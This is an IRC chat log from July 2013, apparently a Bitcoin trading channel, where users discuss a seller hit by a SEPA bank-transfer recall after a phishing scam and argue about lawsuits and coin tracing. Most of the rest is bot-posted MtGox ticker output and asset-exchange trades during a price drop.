obviously it's everyone's fault BUT of the person that failed to be secure. Jul 05 15:07:43 since that is not the reason to get money back from him. The law is just that i cant be the owner of stolen money and therefor have to pay it back Jul 05 15:07:45 jimmy2k: it'd still teach the man to keep his mouth shut and stop helping scammers Jul 05 15:08:10 Diablo-D3 what's next, rescind old people's driving licenses ? Jul 05 15:08:10 in the US, that 75 year old man would still be charged with a crime Jul 05 15:08:16 conspiracy to commit banking fraud Jul 05 15:08:33 sure! I mean this guy gave aways his TANs for doing online transactions... completely stupid Jul 05 15:09:20 he'd have to prove it was a case of identity theft, and that is very hard Jul 05 15:09:26 what would you advice me to do now? I will post a thread on bitcointalk for sure Jul 05 15:09:34 yes, post a thread in the scammer subforum Jul 05 15:10:12 <[Namworld]> Well when you neglect to protect your computer/accounts, it can create damage around. Jul 05 15:10:15 mircea_popescu: I dont put up with this shit Jul 05 15:10:29 if someone "steals" your bank account, you should be liable for anything that happens Jul 05 15:10:30 period Jul 05 15:10:32 I dont care if you're 75 Jul 05 15:10:44 well maybe in theory, but in practice it dun work that way. Jul 05 15:11:02 otherwise i'm the first one to propose microsoft be sent to prison in corpore, Jul 05 15:11:08 including all past employees in any capacity. Jul 05 15:11:12 yes, I agree Jul 05 15:11:15 but isnt there a way to monitor the transactions from this given address and perhaps link it to an identity somehow? I am thinking about something like that: http://arxiv.org/abs/1107.4524 Jul 05 15:11:20 microsoft can make a secure OS, they choose not to. Jul 05 15:11:33 you think more attacks happen against windows users because there are more of them? nope Jul 05 15:11:44 more attacks happen against OSX users because OSX users _are richer_ Jul 05 15:11:53 jimmy2k: short of gox/stamp/whatever tracing coins to an account and giving you his info, no Jul 05 15:12:03 jimmy2k: was he on irc? Jul 05 15:12:18 you know why OSX security flaws make the news? because they're so fucking rare Jul 05 15:12:21 dont think so Jul 05 15:12:28 Scrat, he doesnt seem intelligent at all Jul 05 15:12:36 he didnt use tor Jul 05 15:12:39 I mean where did you 2 talk Jul 05 15:12:47 lb chat Jul 05 15:12:53 jimmy2k: he could have been using a zombie machine as a proxy though Jul 05 15:13:25 d34th darkee_ davout daybyter deadweasel Diablo-D3 Dimsler dooglus dub Jul 05 15:13:27 jimmy2k what Diablo-D3 said. Jul 05 15:13:33 looks like the log isn't updating as it should /cc kakobrekla Jul 05 15:13:49 I think he is stupid. And maybe he is even doing crime without even knowing it Jul 05 15:13:57 SEPA bank transfers are reversible Jul 05 15:13:58 in any case it's either a retarded kid in sierra leone/whatever, so unless you're in the market for fresh kidneys you're not getting anything Jul 05 15:14:05 up to 10 days after being received Jul 05 15:14:11 it's called a "SEPA Recall" Jul 05 15:14:13 or else it's some russian mobster/whatever, in which case it's easier to just declare war. Jul 05 15:14:17 davout: try 90 Jul 05 15:14:21 hm he spoke italian and the ips are from italian Jul 05 15:14:24 that would fit at least Jul 05 15:14:29 Scrat: it's 10 Jul 05 15:14:36 davout there's actually two. Jul 05 15:14:37 honestly, I dont know why we havent declared war againts russia Jul 05 15:14:41 its where all the scammers live Jul 05 15:14:41 he registered an email account where the police officer is now trying to get everything he can from Jul 05 15:14:44 and the government doesnt care Jul 05 15:14:44 two what ? Jul 05 15:14:50 i think he can get all his emails ever sent Jul 05 15:14:54 Diablo-D3 because patton was not politically correct Jul 05 15:14:57 and he peed in rivers. Jul 05 15:15:17 mircea_popescu: doesnt mean the rest of the world cant just ddos every russian IP until the country surrenders Jul 05 15:15:25 kinda does, yes. Jul 05 15:15:41 <[Namworld]> The bank don't pay you any fair interest on your account and charges you for transactions/services fee anyway. They should just insure holders for such damage. And slap them a warning/fine. Next time, boot them out, go find another bank. Jul 05 15:15:45 for the non-believers, it's 10 days, and there's one type of SEPA recall : http://help.sap.com/saphelp_pme70/helpdata/en/f4/7e7970ab0545debf2ecaeeeb55d071/content.htm Jul 05 15:15:51 afaik the russians ddosed the shit out of those spam politico dudes. Jul 05 15:16:10 <[Namworld]> I only do cash transaction when selling. Any anonymous user of Bitcoin can buy using cash. Jul 05 15:16:11 jimmy2k: you have some grounds to sue Jul 05 15:16:14 mircea_popescu: I'd like to see what russia does with an exabit of traffic up their asses Jul 05 15:16:34 davout: yes, but he doenst know the actual identity of the user Jul 05 15:16:39 davout: so he has no one to sue Jul 05 15:16:45 [Namworld], since around year 2000 every bank has protection against these cases in their user agreements Jul 05 15:16:47 <[Namworld]> When selling, I recommend always using an exchange. The exchange will never chargebank the bank deposit. Jul 05 15:16:48 I still think he should sue the 75 year old man, I dont believe his story Jul 05 15:17:02 davout no, actually, if the funds are part of a criminal entreprise they can be recovered on a different system Jul 05 15:17:21 Diablo-D3: sue the originating banks on the ground that they should bear the cost of fraud as he can prove he isn't a phisher, and that the bank didn't ensure the safety of the originating party's bank account access Jul 05 15:17:43 that's valid but expensive. Jul 05 15:17:47 davout: easier to just burn the bank down Jul 05 15:17:48 mircea_popescu: which would be ? Jul 05 15:17:54 davout: like we're slowly doing here in the US Jul 05 15:18:24 hm davout my lawyer said I wont have success with this strategy Jul 05 15:18:41 find a new lawyer then Jul 05 15:18:44 one with balls Jul 05 15:18:49 mircea_popescu: i'm talking about automated SEPA bank procedures, not about doing forced recovery after some judgement has taken place, if you have more info i'm interested Jul 05 15:19:03 since this is not a reason to get my money back! I am not owner of the money and can never be since it was not transferred legally Jul 05 15:19:10 i'm not sure what's public and too fucking lazy to search through it. Jul 05 15:19:25 you're talking about the payer-initiated recall procedure, which is valid Jul 05 15:19:41 jimmy2k: yeah, do that, try with another lawyer, and you could also sue your bank for complying with the request without asking you about the recall (which it has the right to do) Jul 05 15:19:48 there's however a different acct freezing/transaction anulling procedure that's not judicial but administrative. Jul 05 15:20:07 davout, do you have any experience in cases like that? Jul 05 15:20:16 jimmy2k: sepa recalls ? fuck yes Jul 05 15:20:42 did a bank ever do a sepa chargeback without permission? Jul 05 15:21:28 mircea_popescu: never heard about what you're mentioning, but unlike the recall it seems if i follow you, that it isn't payer initiated, and as such, not easily used for scamming Jul 05 15:22:09 except if the payee instead of initiating a recall files a complaint with his bank as to fraud/phishing etc Jul 05 15:22:09 mircea_popescu: and it's prob. not specific to wires either, if you remember how it's called i'll have a look Jul 05 15:22:30 mircea_popescu: a bank won't do a recall if you don't do that in most cases Jul 05 15:23:08 in the cases of fraud it's the recall mechanism that's used Jul 05 15:23:28 if it can be effectually used. Jul 05 15:23:43 but if it's something like a large batch of ccs compromised which is only discovered 3-4 weeks in Jul 05 15:23:50 there's an alternate procedure Jul 05 15:23:56 my banks statement for the chargeback was: there is an active accuse against you for phishing. In case of fraud we have the right to chargeback the money first untill the case is cleared... Jul 05 15:24:18 jimmy2k that's actually withholding it then Jul 05 15:25:15 then the money was transferred back and the bank said if you want your money back, you have to make clear that the bank account holder of the payment did this transaction legally on his purpose Jul 05 15:25:32 thats impossible in my case since he was the 3rd party phishing victim Jul 05 15:26:24 jimmy2k: that's why you should sue both banks, the first for not having secured the victim's account enough and passing the bill to you Jul 05 15:27:59 hm. my lawyer said he had similar cases and these accusations are not successful Jul 05 15:28:14 since the banks have a protection in their user agreements Jul 05 15:28:55 to not protect users from neglicence Jul 05 15:29:05 negligence Jul 05 15:29:07 credit cards may actually become safer than wire transfers in the EU Jul 05 15:29:14 You don't have any signed agreement with the old guy's bank. Jul 05 15:29:29 well then, you could sue the victim :) Jul 05 15:29:39 Namworld: true Jul 05 15:29:46 Your bank might have a clause about not protecting you from negligence which you agreed to. Jul 05 15:29:59 The other bank... no... Jul 05 15:30:38 yes davout but as I said, my lawyer says this is not powerful enough to get the money back. Anyway i think this is a good point Jul 05 15:30:48 maybe i talk to different lawyers Jul 05 15:31:16 maybe i just try to get the thief first Jul 05 15:31:46 I gave some informations to the police and they can spy all his email traffic now Jul 05 15:32:27 jimmy2k: SEPA recalls are a problem, you got scammed because you were ignorant of this particular mechanism. at least it doesn't put in the category of ppl that got scammed because of stupidity, but merely as a result of ignoring a SEPA technicality Jul 05 15:32:56 jimmy2k: you'll probably have more luck with some low-budget lawsuit than trying to play internet detective Jul 05 15:33:13 davout, it was a german bank transfer, where my bank assured me that there are no chargeback possible Jul 05 15:33:23 but that was on the phone and i cant prove this... Jul 05 15:33:39 jimmy2k: well, go naively ask again, record the whole thing :-) Jul 05 15:33:44 Start recording all your phone calls =P Jul 05 15:33:54 make a fuss about it Jul 05 15:34:13 maybe i talk to different lawyers << get it straight : this is something to prosecute if you wish to teach banks a lesson and are powerful enough to. Jul 05 15:34:16 it's a political point. Jul 05 15:34:28 if your interests are purely patrimonial better do something else with the time. Jul 05 15:34:58 mircea_popescu: the real political point is to fight banks from blocking IBANs they don't like to receive bank transfers, yes ING, KBC, Fortis, I'm looking at you bitchez Jul 05 15:35:07 davout one of many technicalities the banks specifically mislead customers about as a business practice. Jul 05 15:35:13 word Jul 05 15:35:32 even PSPs don't know about this Jul 05 15:35:39 true... If you get an answer once... might get it multiple times again. Try to get told again by your bank there's no chargeback possible while having your phonecall recorded. Can be useful. Jul 05 15:35:39 some do. Jul 05 15:35:58 Namworld the call was recorded anyway, you can call it up in court Jul 05 15:36:00 well, some don't, and that's already kind of a big surprise Jul 05 15:36:10 it won't do much because well, call center personnel. who cares what they say. Jul 05 15:36:36 i think this has a chance in court, but hey I<3ANAL Jul 05 15:37:02 unless he's worth plenty of millions and is looking at some sort of side channel benefit, it's not worth it, no. Jul 05 15:37:44 depends on the availability of some kind of small-claims court, where you don't need a lawyer and can play the "david vs goliath" card to an understanding judge Jul 05 15:37:55 it will get thrown out on appeal. Jul 05 15:38:00 Namworld the call was recorded anyway, you can call it up in court << what? how that? Jul 05 15:38:21 mircea_popescu: if the bank bothers to appeal and get some bad PR for the sake of 15k€ Jul 05 15:38:22 well ? didn't they play a little "this call may be monitored to assist" bla bla ? Jul 05 15:38:40 davout they will appeal because of the dangerous precedent. what bad pr, nobody reads. Jul 05 15:38:42 it's all in the "may" Jul 05 15:38:57 make an ad campaign with B cup tits and all is well. Jul 05 15:39:34 mebbe right, i'd go anyway, just for the lulz of taking on a bank and playing the david vs goliath card while actually being called david Jul 05 15:39:47 muhahahahaa Jul 05 15:39:54 yea well, you enjoy pro se. Jul 05 15:39:56 not everyone does. Jul 05 15:40:32 guess not Jul 05 15:40:57 most people stress the fuck out in court, it's what white coat disease used to be Jul 05 15:41:13 Well they often record calls. Many businesses do. Jul 05 15:41:18 Either to check if an employee said innacurate things/doesn't do his work correctly and in case of complaint, check if the customer was indeed told something. Jul 05 15:46:56 They have to take responsibility for what any employee tell customers. Employees can get fired too for saying innacurate things. Jul 05 15:47:08 You often hear the disclaimer that "This call may be recorded for quality assurance" Jul 05 15:47:08 Well they're watching their employees and what customers are told. Jul 05 15:47:08 I dont think its a hopeless point to track bitcoin traffic and look at the destination address blockchain.info/fb/1nrrenk Jul 05 15:47:09 I could just use some graphical tools and analyse transfers to this account. I mean this has done several times before like here: http://arxiv.org/abs/1107.4524 Jul 05 16:00:07 jborkl jcpham Jezzz jimmy2k joeykrim jordandotdev jurov Jul 05 16:00:07 jborkl jcpham Jezzz jimmy2k joeykrim jordandotdev jurov Jul 05 16:00:25 jimmy2k not only is it pointless, it is an attack upon bitcoin and you'll be met with the respective hostility. Jul 05 16:01:01 please keep your fiat disputes in the fiat world. Jul 05 16:01:31 yes what mp said Jul 05 16:08:28 -NickServ- Account mircea_popescu dropped, forcing logout Jul 05 16:10:27 -tomaw- [Global Notice] Hi all. We're experiencing some issues with NickServ etc. We're working on fixing it now. Jul 05 16:11:35 -NickServ- This nickname is registered. Please choose a different nickname, or identify via /msg NickServ identify . Jul 05 16:11:35 -NickServ- You have 30 seconds to identify to your nickname before it is changed. Jul 05 16:12:09 freenode, what are you doing! Jul 05 16:12:26 ha ha ha Jul 05 16:12:42 wtf Jul 05 16:12:56 Fuck you, freenode Jul 05 16:13:13 Your salary will be lowered Jul 05 16:13:19 Stop sleeping at work Jul 05 16:13:44 You keep mashing the wrong buttons with your huge, sleepy head. Jul 05 16:14:42 Hey, don't you fall asleep while I'm talking to you! You're fired! Jul 05 16:19:38 Gah... Jul 05 16:30:38 http://25.media.tumblr.com/tumblr_mbanz1XjU21qfon6oo1_500.jpg Jul 05 16:36:55 d cup PR is much better right mircea_popescu ? Jul 05 16:36:59 *rim shot* Jul 05 16:37:37 wait what ? Jul 05 16:40:57 lol Jul 05 16:41:11 I was trying to make a pun about MPOE-PR Jul 05 16:43:18 http://www.finextra.com/Video/Video.aspx?videoid=420 Jul 05 16:43:22 Finextra: Bitcoin businesses need 'adult' supervision Jul 05 16:43:42 did you make that mircea_popescu ? Jul 05 16:43:53 the nickserv shit is over? Jul 05 16:44:23 thestringpuller nope. as clearly displayed by the inept "adult supervision" cliche Jul 05 16:45:46 ;;ticker Jul 05 16:45:47 MtGox BTCUSD ticker | Best bid: 72.95000, Best ask: 73.00000, Bid-ask spread: 0.05000, Last trade: 72.96666, 24 hour volume: 35803.41550795, 24 hour low: 71.55000, 24 hour high: 81.70000, 24 hour vwap: 76.01168 Jul 05 16:46:45 wtf stop going own and go back up Jul 05 16:49:42 this is mtgox's fault Jul 05 16:49:46 lets get the pitchforks Jul 05 16:50:40 the day traders want the price to die, and no one new is buying Jul 05 16:50:43 so it will die Jul 05 16:51:16 big cunk of economy is around mining, which also has fiat leakage Jul 05 16:51:20 need new money Jul 05 16:52:03 we are failing at the most important part of a ponzi Jul 05 16:52:42 lol Jul 05 16:52:48 so should I sell 50 btc now? Jul 05 16:53:51 get someone new to buy it Jul 05 16:54:16 well I can easily dump it at $72 Jul 05 16:58:15 buying now isn''t a shame, even if it goes down to 50 again, but the arising question will be, if this year's uptrend was unsustainable from the beginning and we go sub 30 **** BEGIN LOGGING AT Fri Jul 5 20:13:05 2013 Jul 05 20:16:56 [BTCTC] [DMS.MINING] 1 @ 0.020297 BTC [-] Jul 05 20:20:19 ;;ticker Jul 05 20:20:20 MtGox BTCUSD ticker | Best bid: 70.66777, Best ask: 71.00000, Bid-ask spread: 0.33223, Last trade: 70.66778, 24 hour volume: 44782.67573548, 24 hour low: 70.25000, 24 hour high: 81.70000, 24 hour vwap: 74.76464 Jul 05 20:27:54 [BTCTC] [ASICMINER-PT] 1 @ 4.275001 BTC [-] Jul 05 20:29:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.043123 BTC [-] Jul 05 20:29:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.043123 BTC [-] Jul 05 20:29:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.042872 = 2.1436 BTC [-] Jul 05 20:29:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042872 BTC [-] Jul 05 20:29:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.042871 BTC [-] Jul 05 20:29:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.042871 BTC [-] Jul 05 20:29:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.042869 BTC [-] Jul 05 20:29:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.042868 BTC [-] Jul 05 20:29:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:29:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:29:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:29:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:29:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:30:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:30:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:30:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:30:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.042867 BTC [-] Jul 05 20:30:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.042866 BTC [-] Jul 05 20:30:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.042866 BTC [-] Jul 05 20:30:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.042866 BTC [-] Jul 05 20:30:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.042603 = 0.0852 BTC [-] Jul 05 20:30:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.042602 = 0.426 BTC [-] Jul 05 20:30:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.042601 = 0.852 BTC [-] Jul 05 20:30:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.042601 = 0.1278 BTC [-] Jul 05 20:30:39 [BTCTC] [ASICMINER-PT] 1 @ 4.275001 BTC [-] Jul 05 20:30:46 [BTCTC] [ASICMINER-PT] 12 @ 4.275 = 51.3 BTC [-] Jul 05 20:31:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199999 BTC [+] Jul 05 20:31:32 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Jul 05 20:31:53 [BTCTC] [PAJKA.BOND] 6 @ 0.055 = 0.33 BTC [-] Jul 05 20:32:39 [BTCTC] [ESECURITYSABTC] 1 @ 0.314239 BTC [+] Jul 05 20:32:51 [BTCTC] [BTC-BOND] 13 @ 0.01 = 0.13 BTC [+] Jul 05 20:34:21 [BTCTC] [PAJKA.BOND] 24 @ 0.055 = 1.32 BTC [-] Jul 05 20:34:42 ;;ticker Jul 05 20:34:42 MtGox BTCUSD ticker | Best bid: 70.20100, Best ask: 70.25000, Bid-ask spread: 0.04900, Last trade: 70.20100, 24 hour volume: 51333.91341587, 24 hour low: 68.00000, 24 hour high: 81.70000, 24 hour vwap: 74.05867 Jul 05 20:34:59 ;;goxlag Jul 05 20:35:00 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Jul 05 20:35:02 [BTCTC] [ESECURITYSABTC] 3 @ 0.314239 = 0.9427 BTC [+] Jul 05 20:35:14 [BTCTC] [TAT.ASICMINER] 11 @ 0.042602 = 0.4686 BTC [+] Jul 05 20:35:21 [BTCTC] [TAT.ASICMINER] 49 @ 0.042601 = 2.0874 BTC [-] Jul 05 20:35:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.042601 BTC [-] Jul 05 20:35:24 ;;ticker Jul 05 20:35:24 MtGox BTCUSD ticker | Best bid: 70.20100, Best ask: 70.25000, Bid-ask spread: 0.04900, Last trade: 70.20100, 24 hour volume: 51368.74824153, 24 hour low: 68.00000, 24 hour high: 81.70000, 24 hour vwap: 74.04892 Jul 05 20:35:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0426 = 0.213 BTC [-] Jul 05 20:35:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0426 BTC [-] Jul 05 20:35:35 [BTCTC] [ESECURITYSABTC] 1 @ 0.31424 BTC [+] Jul 05 20:35:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.042505 = 1.0626 BTC [-] Jul 05 20:35:41 That ticker isn't accurate... Jul 05 20:35:44 nope Jul 05 20:35:51 We're at 68 =/ Jul 05 20:36:36 [BTCTC] [ASICMINER-PT] 1 @ 4.271001 BTC [-] Jul 05 20:37:10 [BTCTC] [PAJKA.BOND] 20 @ 0.055 = 1.1 BTC [-] Jul 05 20:37:25 [BTCTC] [TAT.ASICMINER] 13 @ 0.042355 = 0.5506 BTC [-] Jul 05 20:38:09 [BTCTC] [ESECURITYSABTC] 3 @ 0.32 = 0.96 BTC [+] Jul 05 20:38:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.042356 BTC [+] Jul 05 20:38:21 [BTCTC] [TAT.ASICMINER] 11 @ 0.042355 = 0.4659 BTC [-] Jul 05 20:38:23 [BTCTC] [TAT.ASICMINER] 71 @ 0.042002 = 2.9821 BTC [-] Jul 05 20:38:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.042001 = 0.84 BTC [-] Jul 05 20:38:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 05 20:38:27 seems so, that's why i ask 2 time :/ Jul 05 20:38:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.042 = 1.26 BTC [-] Jul 05 20:38:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.042 = 1.05 BTC [-] Jul 05 20:38:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.042 = 0.42 BTC [-] Jul 05 20:38:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.042 = 0.504 BTC [-] Jul 05 20:38:46 [HAVELOCK] [ASICM] 1 @ 0.042301 BTC [-] Jul 05 20:39:05 [BTCTC] [ASICMINER-PT] 1 @ 4.271001 BTC [-] Jul 05 20:39:10 [BTCTC] [ASICMINER-PT] 1 @ 4.271 BTC [-] Jul 05 20:39:16 [BTCTC] [ASICMINER-PT] 4 @ 4.270001 = 17.08 BTC [-] Jul 05 20:39:24 [BTCTC] [ASICMINER-PT] 10 @ 4.27 = 42.7 BTC [-] Jul 05 20:39:28 [BTCTC] [ASICMINER-PT] 1 @ 4.26 BTC [-] Jul 05 20:39:33 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 05 20:39:38 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 05 20:40:27 [BTCTC] [ASICMINER-PT] 1 @ 4.211 BTC [-] Jul 05 20:40:29 i had a dream about ThickAsThieves arbing Jul 05 20:40:33 [BTCTC] [ASICMINER-PT] 1 @ 4.2108 BTC [-] Jul 05 20:40:35 oh wait that was real lyfe Jul 05 20:40:38 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 05 20:40:48 [BTCTC] [AMC-PT] 174 @ 0.0019 = 0.3306 BTC [-] Jul 05 20:41:03 [BTCTC] [ASICMINER-PT] 2 @ 4.2001 = 8.4002 BTC [-] Jul 05 20:41:12 [BTCTC] [ASICMINER-PT] 15 @ 4.2 = 63 BTC [-] Jul 05 20:41:19 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 05 20:42:08 [HAVELOCK] [ASICM] 52 @ 0.042401 = 2.2049 BTC [+] Jul 05 20:42:10 [HAVELOCK] [ASICM] 417 @ 0.042401 = 17.6812 BTC [+] Jul 05 20:42:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.043297 = 0.0866 BTC [+] Jul 05 20:42:12 [HAVELOCK] [ASICM] 531 @ 0.042401 = 22.5149 BTC [+] Jul 05 20:42:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0425 = 0.1275 BTC [-] Jul 05 20:42:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.041012 = 0.4101 BTC [-] Jul 05 20:42:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.041 = 0.123 BTC [-] Jul 05 20:42:19 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 05 20:42:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 05 20:42:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 05 20:42:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.041 = 0.246 BTC [-] Jul 05 20:42:27 [HAVELOCK] [ASICM] 56 @ 0.042401 = 2.3745 BTC [+] Jul 05 20:42:28 [HAVELOCK] [ASICM] 142 @ 0.042301 = 6.0067 BTC [-] Jul 05 20:42:29 [HAVELOCK] [ASICM] 1 @ 0.0423 BTC [-] Jul 05 20:42:30 [HAVELOCK] [ASICM] 201 @ 0.042 = 8.442 BTC [-] Jul 05 20:42:39 [HAVELOCK] [ASICM] 4 @ 0.042501 = 0.17 BTC [+] Jul 05 20:42:45 [HAVELOCK] [ASICM] 13 @ 0.042501 = 0.5525 BTC [+] Jul 05 20:42:47 [BTCTC] [ASICMINER-PT] 1 @ 4.1818 BTC [-] Jul 05 20:42:50 [HAVELOCK] [ASICM] 4 @ 0.0425 = 0.17 BTC [-] Jul 05 20:42:57 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 05 20:43:06 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 05 20:43:07 [HAVELOCK] [ASICM] 5 @ 0.042001 = 0.21 BTC [-] Jul 05 20:43:09 [HAVELOCK] [ASICM] 127 @ 0.042 = 5.334 BTC [-] Jul 05 20:43:12 [BTCTC] [S.DICE-PT] 200 @ 0.003 = 0.6 BTC [+] Jul 05 20:43:14 [BTCTC] [ASICMINER-PT] 4 @ 4.1 = 16.4 BTC [-] Jul 05 20:43:15 [BTCTC] [PAJKA.BOND] 44 @ 0.053 = 2.332 BTC [-] Jul 05 20:43:21 [BTCTC] [ASICMINER-PT] 3 @ 4.1 = 12.3 BTC [-] Jul 05 20:43:25 [BTCTC] [ASICMINER-PT] 1 @ 4.0601 BTC [-] Jul 05 20:43:32 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 05 20:43:38 [BTCTC] [ASICMINER-PT] 2 @ 4.05 = 8.1 BTC [-] Jul 05 20:43:43 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 05 20:43:54 damn Jul 05 20:44:07 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 05 20:44:08 [BTCTC] [ESECURITYSABTC] 7 @ 0.32 = 2.24 BTC [+] Jul 05 20:44:43 oh shiiiit Jul 05 20:44:45 ;;ticker Jul 05 20:44:46 MtGox BTCUSD ticker | Best bid: 66.42500, Best ask: 66.60000, Bid-ask spread: 0.17500, Last trade: 66.29789, 24 hour volume: 53864.09814132, 24 hour low: 66.29789, 24 hour high: 81.70000, 24 hour vwap: 73.72632 Jul 05 20:44:48 [BTCTC] [ASICMINER-PT] 2 @ 4.03 = 8.06 BTC [-] Jul 05 20:45:06 I bought some gold this morning with my coins :-P Jul 05 20:45:13 hope they honor the price! Jul 05 20:45:23 [BTCTC] [ASICMINER-PT] 1 @ 4.0209 BTC [-] Jul 05 20:45:31 can you buy gold on Amazon? Jul 05 20:45:33 :) Jul 05 20:45:47 Bugpowder: what's the move! Jul 05 20:45:49 What should I do? Jul 05 20:46:00 I'm going to hold on Jul 05 20:46:04 sell anything someone will buy Jul 05 20:46:04 I dunno Jul 05 20:46:05 I'M PANICING!!! Jul 05 20:46:07 yeah Jul 05 20:46:11 Bugpowder!!!!!!! Jul 05 20:46:13 Rebuy at 20 Jul 05 20:46:16 You are our only hope!!! Jul 05 20:46:25 I couldn't cash out fast enough Jul 05 20:46:30 gox cancelled my wires Jul 05 20:46:41 is that what's causing this Jul 05 20:46:50 Gox is a big part of it Jul 05 20:46:52 the insolvency of usd in MtGox? Jul 05 20:47:06 the possible insolvency of USD in gox Jul 05 20:47:07 I heard they've dropped to 40% market share of trades Jul 05 20:47:15 that's false Jul 05 20:47:20 they are 65% still Jul 05 20:47:26 [HAVELOCK] [ASICM] 1 @ 0.040999 BTC [-] Jul 05 20:47:30 that's a huge drop from ~80% Jul 05 20:47:37 [BTCTC] [ASICMINER-PT] 2 @ 4.46 = 8.92 BTC [+] Jul 05 20:47:41 http://bitcoinity.org/markets/list?currency=ALL&span=3d Jul 05 20:47:46 13:47 < Bugpowder> http://bitcoinity.org/markets/list?currency=ALL&span=3d Jul 05 20:47:49 Bitcoinity.org Jul 05 20:47:50 asicminer is done Jul 05 20:47:51 oops Jul 05 20:48:01 yep Jul 05 20:48:01 why is AM done? Jul 05 20:48:32 you think the ASIC model makes sense when BTC is at $15? Jul 05 20:48:48 Probably need to update your ad TaT Jul 05 20:49:00 ad expired ;) Jul 05 20:49:04 [BTCTC] [ASICMINER-PT] 1 @ 4.003001 BTC [-] Jul 05 20:49:07 "One of several $15,000,000 companies without a website" Jul 05 20:49:13 hehe Jul 05 20:49:28 ahh Jul 05 20:49:32 here comes the bounce? Jul 05 20:49:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.041001 = 0.82 BTC [+] Jul 05 20:49:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.041 = 0.615 BTC [-] Jul 05 20:49:45 [BTCTC] [TAT.ASICMINER] 25 @ 0.040237 = 1.0059 BTC [-] Jul 05 20:49:47 [HAVELOCK] [ASICM] 12 @ 0.040221 = 0.4827 BTC [-] Jul 05 20:49:49 [HAVELOCK] [ASICM] 10 @ 0.04022 = 0.4022 BTC [-] Jul 05 20:49:50 [HAVELOCK] [ASICM] 10 @ 0.04021 = 0.4021 BTC [-] Jul 05 20:49:51 [HAVELOCK] [ASICM] 10 @ 0.04011 = 0.4011 BTC [-] Jul 05 20:49:53 [HAVELOCK] [ASICM] 100 @ 0.0401 = 4.01 BTC [-] Jul 05 20:49:54 [HAVELOCK] [ASICM] 250 @ 0.040005 = 10.0013 BTC [-] Jul 05 20:49:55 [HAVELOCK] [ASICM] 28 @ 0.04 = 1.12 BTC [-] Jul 05 20:49:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0402 BTC [-] Jul 05 20:49:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.04015 = 0.6023 BTC [-] Jul 05 20:49:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.04012 = 0.8024 BTC [-] Jul 05 20:50:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.0401 = 0.2807 BTC [-] Jul 05 20:50:16 [MPEX] [S.MPOE] 6200 @ 0.00080543 = 4.9937 BTC [+] Jul 05 20:50:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0401 = 0.2005 BTC [-] Jul 05 20:50:19 [MPEX] [S.MPOE] 500 @ 0.0008085 = 0.4043 BTC [+] Jul 05 20:50:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.0401 = 0.401 BTC [-] Jul 05 20:50:24 [HAVELOCK] [ASICM] 80 @ 0.0400001 = 3.2 BTC [+] Jul 05 